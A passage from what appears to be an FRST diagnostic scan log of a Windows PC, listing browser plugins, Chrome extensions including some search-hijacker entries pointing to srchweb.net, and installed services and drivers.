FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-05-02] (Adobe Inc. -> Adobe Systems Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/","hxxp://facebook.com/"
CHR NewTab: Default ->  Not-active:"chrome-extension://nhkpbpdabcamdnnfbnipmllcppibnaha/newtab/slim_newtabpage.html", Active:"chrome-extension://mabloidgodmbnmnhoenmhlcjkfelomgp/ntp.html", Not-active:"chrome-extension://hceaclbnbpdcofjcefkffolobgealmlf/content/newtab.html", Not-active:"chrome-extension://ljnpocppiglgfcihjgapllpdcjppjgmo/newtab/newtab.html"
CHR DefaultSearchURL: Default -> hxxps://services.srchweb.net/search/{searchTerms}
CHR DefaultSearchKeyword: Default -> SearchWeb
CHR DefaultSuggestURL: Default -> hxxps://sug.srchweb.net/sug/?s={searchTerms}
CHR Profile: C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default [2019-07-17]
CHR Extension: (Docs) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-25]
CHR Extension: (Google Drive) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-20]
CHR Extension: (YouTube) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2019-04-20]
CHR Extension: (Google Search) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Search by Image (by Google)) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\dajedkncpodkggklbegccjpmnglmnflm [2016-10-20]
CHR Extension: (Adobe Acrobat) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-06-11]
CHR Extension: (Privacy Switch) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejnoifmdngghahakfdlpbfllmodapmlo [2016-11-20]
CHR Extension: (SearchWeb) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm [2018-05-12]
CHR Extension: (Google Docs Offline) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (Search Manager (filmsmania)) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf [2017-05-26]
CHR Extension: (Grammarly for Chrome) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2019-07-17]
CHR Extension: (MySearch) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdjggbdjkcmbonmclbnnpmfgiphfkmdj [2017-03-19]
CHR Extension: (Webroot Filtering Extension) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjeghcllfecehndceplomkocgfbklffd [2019-06-05]
CHR Extension: (Seen On Screen) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo [2019-04-18]
CHR Extension: (EasyDocMerge) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mabloidgodmbnmnhoenmhlcjkfelomgp [2019-06-21]
CHR Extension: (Email Access Online) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhkpbpdabcamdnnfbnipmllcppibnaha [2018-03-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-05]
CHR Extension: (Gmail) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-15]
CHR Extension: (Chrome Media Router) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-06-21]
CHR HKLM-x32\…\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\…\Chrome\Extension: [kjeghcllfecehndceplomkocgfbklffd] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [240640 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [233328 2012-01-23] (DTS, Inc. -> DTS, Inc)
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5750440 2015-09-04] (Fitbit, Inc. -> Fitbit, Inc.) [File not signed]
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe [130976 2011-03-01] (Futuremark, Inc. -> Futuremark Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [166720 2012-06-25] (Intel Corporation -> Intel Corporation)
S3 RaMediaServer; C:\Program Files (x86)\Ralink\Common\RaMediaServer.exe [621632 2011-03-04] (Ralink Technology Corporation -> )
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
R2 WRSVC; C:\Program Files\Webroot\WRSA.exe [4584344 2019-07-17] (Webroot Inc. -> Webroot)
 
===================== Drivers (All) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 1394ohci; C:\Windows\system32\drivers\1394ohci.sys [229888 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R0 ACPI; C:\Windows\System32\drivers\ACPI.sys [334528 2018-02-10] (Microsoft Windows -> Microsoft Corporation)
S3 AcpiPmi; C:\Windows\system32\drivers\acpipmi.sys [12800 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 adp94xx; C:\Windows\system32\drivers\adp94xx.sys [491088 2009-07-13] (Microsoft Windows -> Adaptec, Inc.)
S3 adpahci; C:\Windows\system32\drivers\adpahci.sys [339536 2009-07-13] (Microsoft Windows -> Adaptec, Inc.)
S3 adpu320; C:\Windows\system32\drivers\adpu320.sys [182864 2009-07-13] (Microsoft Windows -> Adaptec, Inc.)
R1 AFD; C:\Windows\system32\drivers\afd.sys [496128 2017-04-04] (Microsoft Windows -> Microsoft Corporation)
S3 agp440; C:\Windows\system32\drivers\agp440.sys [60648 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 ahcix64s; C:\Windows\system32\drivers\ahcix64s.sys [290600 2011-09-23] (Promise Technology -> Advanced Micro Devices, Inc)
S3 aliide; C:\Windows\system32\drivers\aliide.sys [15440 2009-07-13] (Microsoft Windows -> Acer Laboratories Inc.)
S3 amdide; C:\Windows\system32\drivers\amdide.sys [15440 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 AmdK8; C:\Windows\system32\drivers\amdk8.sys [64512 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R3 amdkmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [11278336 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\Windows\System32\DRIVERS\atikmpag.sys [552960 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 AmdPPM; C:\Windows\system32\drivers\amdppm.sys [60928 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
S3 amdsata; C:\Windows\system32\drivers\amdsata.sys [107904 2011-03-11] (Microsoft Windows -> Advanced Micro Devices)
S3 amdsbs; C:\Windows\system32\drivers\amdsbs.sys [194128 2009-07-13] (Microsoft Windows -> AMD Technologies Inc.)
R0 amdxata; C:\Windows\System32\drivers\amdxata.sys [27008 2011-03-11] (Microsoft Windows -> Advanced Micro Devices)
S3 AppID; C:\Windows\system32\drivers\appid.sys [62464 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
S3 arc; C:\Windows\system32\drivers\arc.sys [87632 2009-07-13] (Microsoft Windows -> Adaptec, Inc.)
S3 arcsas; C:\Windows\system32\drivers\arcsas.sys [97856 2009-07-13] (Microsoft Windows -> Adaptec, Inc.)
R0 asahci64; C:\Windows\System32\DRIVERS\asahci64.sys [49760 2012-01-06] (ASMedia Technology Inc. -> Asmedia Technology)
R3 asmthub3; C:\Windows\System32\DRIVERS\asmthub3.sys [130536 2011-11-03] (MCCI Internal Testing Software -> ASMedia Technology Inc)
R3 asmtxhci; C:\Windows\System32\DRIVERS\asmtxhci.sys [395752 2011-11-03] (MCCI Internal Testing Software -> ASMedia Technology Inc)
R3 AsyncMac; C:\Windows\System32\DRIVERS\asyncmac.sys [23040 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 atapi; C:\Windows\System32\drivers\atapi.sys [24128 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [2811904 2012-05-22] (Microsoft Windows Hardware Compatibility Publisher -> Qualcomm Atheros Communications, Inc.)
R3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96256 2012-11-06] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S3 atikmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [11278336 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 b06bdrv; C:\Windows\system32\drivers\bxvbda.sys [468480 2009-06-10] (Microsoft Windows -> Broadcom Corporation)
S3 b57nd60a; C:\Windows\System32\DRIVERS\b57nd60a.sys [270848 2009-06-10] (Microsoft Windows -> Broadcom Corporation)
U5 BattC; C:\Windows\System32\Drivers\BattC.sys [28240 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 Beep; C:\Windows\System32\Drivers\Beep.sys [6656 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 blbdrive; C:\Windows\System32\DRIVERS\blbdrive.sys [45056 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 bowser; C:\Windows\System32\DRIVERS\bowser.sys [90112 2018-07-18] (Microsoft Windows -> Microsoft Corporation)
S3 BrFiltLo; C:\Windows\system32\drivers\BrFiltLo.sys [18432 2009-06-10] (Microsoft Windows -> Brother Industries, Ltd.)
S3 BrFiltUp; C:\Windows\system32\drivers\BrFiltUp.sys [8704 2009-06-10] (Microsoft Windows -> Brother Industries, Ltd.)
S3 Brserid; C:\Windows\System32\Drivers\Brserid.sys [286720 2009-07-13] (Microsoft Windows -> Brother Industries Ltd.)
S3 BrSerWdm; C:\Windows\System32\Drivers\BrSerWdm.sys [47104 2009-06-10] (Microsoft Windows -> Brother Industries Ltd.)
S3 BrUsbMdm; C:\Windows\System32\Drivers\BrUsbMdm.sys [14976 2009-06-10] (Microsoft Windows -> Brother Industries Ltd.)
S3 BrUsbSer; C:\Windows\System32\Drivers\BrUsbSer.sys [14720 2009-06-10] (Microsoft Windows -> Brother Industries Ltd.)
S3 BTHMODEM; C:\Windows\system32\drivers\bthmodem.sys [72192 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S4 cdfs; C:\Windows\System32\DRIVERS\cdfs.sys [92672 2019-02-10] (Microsoft Windows -> Microsoft Corporation)
R1 cdrom; C:\Windows\System32\DRIVERS\cdrom.sys [147456 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 circlass; C:\Windows\system32\drivers\circlass.sys [45568 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 CLFS; C:\Windows\System32\CLFS.sys [372456 2019-05-17] (Microsoft Windows -> Microsoft Corporation)
S3 CmBatt; C:\Windows\system32\drivers\CmBatt.sys [17664 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 cmdide; C:\Windows\system32\drivers\cmdide.sys [17488 2009-07-13] (Microsoft Windows -> CMD Technology, Inc.)
R0 CNG; C:\Windows\System32\Drivers\cng.sys [467856 2018-05-14] (Microsoft Windows -> Microsoft Corporation)
S3 Compbatt; C:\Windows\system32\drivers\compbatt.sys [21584 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 CompositeBus; C:\Windows\System32\DRIVERS\CompositeBus.sys [38912 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S4 crcdisk; C:\Windows\system32\drivers\crcdisk.sys [24144 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R1 DfsC; C:\Windows\System32\Drivers\dfsc.sys [115200 2018-04-25] (Microsoft Windows -> Microsoft Corporation)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R1 discache; C:\Windows\System32\drivers\discache.sys [40448 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 Disk; C:\Windows\System32\drivers\disk.sys [73664 2016-01-20] (Microsoft Windows -> Microsoft Corporation)
S3 drmkaud; C:\Windows\system32\drivers\drmkaud.sys [5632 2015-12-08] (Microsoft Windows -> Microsoft Corporation)
R3 DXGKrnl; C:\Windows\System32\drivers\dxgkrnl.sys [986824 2018-09-08] (Microsoft Windows -> Microsoft Corporation)
R3 e1cexpress; C:\Windows\System32\DRIVERS\e1c62x64.sys [482128 2012-08-10] (Intel Corporation -> Intel Corporation)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Microsoft Windows -> Broadcom Corporation)
S3 elxstor; C:\Windows\system32\drivers\elxstor.sys [530496 2009-07-13] (Microsoft Windows -> Emulex)
S3 ErrDev; C:\Windows\system32\drivers\errdev.sys [9728 2018-02-10] (Microsoft Windows -> Microsoft Corporation)
S3 exfat; C:\Windows\System32\Drivers\exfat.sys [195584 2019-02-10] (Microsoft Windows -> Microsoft Corporation)
S3 fastfat; C:\Windows\System32\Drivers\fastfat.sys [205312 2019-02-10] (Microsoft Windows -> Microsoft Corporation)
S3 fdc; C:\Windows\system32\drivers\fdc.sys [29696 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 FileInfo; C:\Windows\System32\drivers\fileinfo.sys [70224 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 Filetrace; C:\Windows\System32\drivers\filetrace.sys [34304 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 flpydisk; C:\Windows\system32\drivers\flpydisk.sys [24576 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 FltMgr; C:\Windows\System32\drivers\fltmgr.sys [288488 2017-12-31] (Microsoft Windows -> Microsoft Corporation)
S3 FsDepends; C:\Windows\System32\drivers\FsDepends.sys [55376 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
U0 Fs_Rec; C:\Windows\System32\Drivers\Fs_Rec.sys [23408 2012-03-01] (Microsoft Windows -> Microsoft Corporation)
R0 fvevol; C:\Windows\System32\DRIVERS\fvevol.sys [223752 2013-01-24] (Microsoft Windows -> Microsoft Corporation)
S3 gagp30kx; C:\Windows\system32\drivers\gagp30kx.sys [65088 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir.sys [31232 2009-06-10] (Microsoft Windows -> Hauppauge Computer Works, Inc.)
S3 HdAudAddService; C:\Windows\System32\drivers\HdAudio.sys [350208 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R3 HDAudBus; C:\Windows\System32\DRIVERS\HDAudBus.sys [122368 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 HidBatt; C:\Windows\system32\drivers\HidBatt.sys [26624 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 HidBth; C:\Windows\system32\drivers\hidbth.sys [100864 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 HidIr; C:\Windows\system32\drivers\hidir.sys [46592 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 HidUsb; C:\Windows\system32\drivers\hidusb.sys [30208 2019-03-04] (Microsoft Windows -> Microsoft Corporation)
S3 HpSAMD; C:\Windows\system32\drivers\HpSAMD.sys [78720 2010-11-20] (Microsoft Windows -> Hewlett-Packard Company)
R3 HTTP; C:\Windows\System32\drivers\HTTP.sys [754176 2017-12-31] (Microsoft Windows -> Microsoft Corporation)
R0 hwpolicy; C:\Windows\System32\drivers\hwpolicy.sys [14720 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 i8042prt; C:\Windows\System32\DRIVERS\i8042prt.sys [105472 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 iaStor; C:\Windows\System32\DRIVERS\iaStor.sys [568600 2012-02-01] (Intel Corporation -> Intel Corporation)
S3 iaStorA; C:\Windows\system32\drivers\iaStorA.sys [565528 2011-12-02] (Intel Corporation -> Intel Corporation)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [23832 2011-12-02] (Intel Corporation -> Intel Corporation)
S3 iaStorV; C:\Windows\system32\drivers\iaStorV.sys [410496 2011-03-11] (Microsoft Windows -> Intel Corporation)
S3 iirsp; C:\Windows\system32\drivers\iirsp.sys [44112 2009-07-13] (Microsoft Windows -> Intel Corp./ICP vortex GmbH)
R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTKVHD64.sys [4102928 2012-08-07] (Realtek Semiconductor Corp -> Realtek Semiconductor Corp.)
S3 intelide; C:\Windows\system32\drivers\intelide.sys [16960 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 intelppm; C:\Windows\system32\drivers\intelppm.sys [62464 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
S3 IpFilterDriver; C:\Windows\System32\DRIVERS\ipfltdrv.sys [82944 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 IPMIDRV; C:\Windows\system32\drivers\IPMIDrv.sys [78848 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 IPNAT; C:\Windows\System32\drivers\ipnat.sys [116224 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 IRENUM; C:\Windows\System32\drivers\irenum.sys [17920 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 isapnp; C:\Windows\system32\drivers\isapnp.sys [20200 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 iScsiPrt; C:\Windows\system32\drivers\msiscsi.sys [274880 2014-02-03] (Microsoft Windows -> Microsoft Corporation)
R0 iusb3hcs; C:\Windows\System32\DRIVERS\iusb3hcs.sys [19264 2012-05-20] (Intel Corporation -> Intel Corporation)
R3 iusb3hub; C:\Windows\System32\DRIVERS\iusb3hub.sys [357184 2012-05-20] (Intel Corporation -> Intel Corporation)
R3 iusb3xhc; C:\Windows\System32\DRIVERS\iusb3xhc.sys [789824 2012-05-20] (Intel Corporation -> Intel Corporation)
S3 ivusb; C:\Windows\System32\DRIVERS\ivusb.sys [29720 2010-07-29] (Initio Corporation -> Initio Corporation)
R3 kbdclass; C:\Windows\system32\drivers\kbdclass.sys [50768 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 kbdhid; C:\Windows\System32\DRIVERS\kbdhid.sys [33280 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R0 KSecDD; C:\Windows\System32\Drivers\ksecdd.sys [95464 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R0 KSecPkg; C:\Windows\System32\Drivers\ksecpkg.sys [153832 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R3 ksthunk; C:\Windows\system32\drivers\ksthunk.sys [20992 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R2 lltdio; C:\Windows\System32\DRIVERS\lltdio.sys [60928 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 LSI_FC; C:\Windows\system32\drivers\lsi_fc.sys [114752 2009-07-13] (Microsoft Windows -> LSI Corporation)
S3 LSI_SAS; C:\Windows\system32\drivers\lsi_sas.sys [106560 2009-07-13] (Microsoft Windows -> LSI Corporation)
S3 LSI_SAS2; C:\Windows\system32\drivers\lsi_sas2.sys [65600 2009-07-13] (Microsoft Windows -> LSI Corporation)
S3 LSI_SCSI; C:\Windows\system32\drivers\lsi_scsi.sys [115776 2009-07-13] (Microsoft Windows -> LSI Corporation)
R2 luafv; C:\Windows\system32\drivers\luafv.sys [114688 2019-03-28] (Microsoft Windows -> Microsoft Corporation)
S3 megasas; C:\Windows\system32\drivers\megasas.sys [35392 2009-07-13] (Microsoft Windows -> LSI Corporation)
S3 MegaSR; C:\Windows\system32\drivers\MegaSR.sys [284736 2009-07-13] (Microsoft Windows -> LSI Corporation, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\HECIx64.sys [62784 2012-07-02] (Intel Corporation -> Intel Corporation)
S3 Modem; C:\Windows\System32\drivers\modem.sys [40448 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 monitor; C:\Windows\System32\DRIVERS\monitor.sys [30208 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 mouclass; C:\Windows\system32\drivers\mouclass.sys [49216 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 mouhid; C:\Windows\System32\DRIVERS\mouhid.sys [31232 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 mountmgr; C:\Windows\System32\drivers\mountmgr.sys [94440 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
S3 mpio; C:\Windows\system32\drivers\mpio.sys [155008 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R3 mpsdrv; C:\Windows\System32\drivers\mpsdrv.sys [77312 2018-08-10] (Microsoft Windows -> Microsoft Corporation)
S3 MRxDAV; C:\Windows\system32\drivers\mrxdav.sys [142336 2016-09-08] (Microsoft Windows -> Microsoft Corporation)
R3 mrxsmb; C:\Windows\System32\DRIVERS\mrxsmb.sys [160768 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R3 mrxsmb10; C:\Windows\System32\DRIVERS\mrxsmb10.sys [291328 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R3 mrxsmb20; C:\Windows\System32\DRIVERS\mrxsmb20.sys [129536 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R0 msahci; C:\Windows\System32\drivers\msahci.sys [31104 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 msdsm; C:\Windows\system32\drivers\msdsm.sys [140672 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R1 Msfs; C:\Windows\System32\Drivers\Msfs.sys [26112 2019-02-03] (Microsoft Windows -> Microsoft Corporation)
S3 mshidkmdf; C:\Windows\System32\drivers\mshidkmdf.sys [8192 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 msisadrv; C:\Windows\System32\drivers\msisadrv.sys [15080 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 MSKSSRV; C:\Windows\System32\drivers\MSKSSRV.sys [11136 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 MSPCLOCK; C:\Windows\System32\drivers\MSPCLOCK.sys [7168 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 MSPQM; C:\Windows\System32\drivers\MSPQM.sys [6784 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 MsRPC; C:\Windows\System32\Drivers\MsRPC.sys [366824 2018-11-11] (Microsoft Windows -> Microsoft Corporation)
R1 mssmbios; C:\Windows\system32\drivers\mssmbios.sys [31976 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 MSTEE; C:\Windows\System32\drivers\MSTEE.sys [8064 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 MTConfig; C:\Windows\system32\drivers\MTConfig.sys [15360 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 Mup; C:\Windows\System32\Drivers\mup.sys [60496 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 NativeWifiP; C:\Windows\System32\DRIVERS\nwifi.sys [324608 2017-09-13] (Microsoft Windows -> Microsoft Corporation)
R0 NDIS; C:\Windows\System32\drivers\ndis.sys [947904 2018-07-06] (Microsoft Windows -> Microsoft Corporation)
S3 NdisCap; C:\Windows\System32\DRIVERS\ndiscap.sys [35328 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 NdisTapi; C:\Windows\System32\DRIVERS\ndistapi.sys [24064 2018-12-07] (Microsoft Windows -> Microsoft Corporation)
R3 Ndisuio; C:\Windows\System32\DRIVERS\ndisuio.sys [56832 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R3 NdisWan; C:\Windows\System32\DRIVERS\ndiswan.sys [164352 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
R3 NDProxy; C:\Windows\System32\Drivers\NDProxy.sys [58368 2018-12-07] (Microsoft Windows -> Microsoft Corporation)
R1 NetBIOS; C:\Windows\System32\DRIVERS\netbios.sys [45056 2017-12-31] (Microsoft Windows -> Microsoft Corporation)
R1 NetBT; C:\Windows\System32\DRIVERS\netbt.sys [262656 2019-02-21] (Microsoft Windows -> Microsoft Corporation)
R3 netr28x; C:\Windows\System32\DRIVERS\netr28x.sys [1488448 2011-04-19] (Ralink Technology Corporation -> Ralink Technology, Corp.)
S3 nfrd960; C:\Windows\system32\drivers\nfrd960.sys [51264 2009-07-13] (Microsoft Windows -> IBM Corporation)
R1 Npfs; C:\Windows\System32\Drivers\Npfs.sys [44544 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R1 nsiproxy; C:\Windows\System32\drivers\nsiproxy.sys [26112 2017-08-11] (Microsoft Windows -> Microsoft Corporation)
R3 Ntfs; C:\Windows\System32\Drivers\Ntfs.sys [1680104 2019-02-10] (Microsoft Windows -> Microsoft Corporation)
R1 Null; C:\Windows\System32\Drivers\Null.sys [6144 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 nvlddmkm; C:\Windows\System32\DRIVERS\nvlddmkm.sys [11572512 2009-06-10] (NVIDIA Corporation -> NVIDIA Corporation)
S3 nvraid; C:\Windows\system32\drivers\nvraid.sys [148352 2011-03-11] (Microsoft Windows -> NVIDIA Corporation)
S3 nvstor; C:\Windows\system32\drivers\nvstor.sys [166272 2011-03-11] (Microsoft Windows -> NVIDIA Corporation)
S3 nv_agp; C:\Windows\system32\drivers\nv_agp.sys [122600 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 ohci1394; C:\Windows\system32\drivers\ohci1394.sys [72832 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 Parport; C:\Windows\system32\drivers\parport.sys [97280 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 partmgr; C:\Windows\System32\drivers\partmgr.sys [75120 2012-03-17] (Microsoft Windows -> Microsoft Corporation)
R0 pci; C:\Windows\System32\drivers\pci.sys [185064 2019-04-18] (Microsoft Windows -> Microsoft Corporation)
S3 pciide; C:\Windows\system32\drivers\pciide.sys [12352 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 pcmcia; C:\Windows\system32\drivers\pcmcia.sys [220752 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R0 pcw; C:\Windows\System32\drivers\pcw.sys [50768 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R2 PEAUTH; C:\Windows\System32\drivers\peauth.sys [663552 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R3 PptpMiniport; C:\Windows\System32\DRIVERS\raspptp.sys [111104 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
S3 Processor; C:\Windows\system32\drivers\processr.sys [60928 2019-06-12] (Microsoft Windows -> Microsoft Corporation)
R1 Psched; C:\Windows\System32\DRIVERS\pacer.sys [131584 2017-12-31] (Microsoft Windows -> Microsoft Corporation)
S3 PSI; C:\Windows\System32\DRIVERS\psi_mf_amd64.sys [18456 2016-02-02] (Secunia -> Secunia)
S3 ql2300; C:\Windows\system32\drivers\ql2300.sys [1524816 2009-07-13] (Microsoft Windows -> QLogic Corporation)
S3 ql40xx; C:\Windows\system32\drivers\ql40xx.sys [128592 2009-07-13] (Microsoft Windows -> QLogic Corporation)
S3 QWAVEdrv; C:\Windows\system32\drivers\qwavedrv.sys [46592 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S3 RasAcd; C:\Windows\System32\DRIVERS\rasacd.sys [14848 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 RasAgileVpn; C:\Windows\System32\DRIVERS\AgileVpn.sys [60416 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R3 Rasl2tp; C:\Windows\System32\DRIVERS\rasl2tp.sys [129536 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
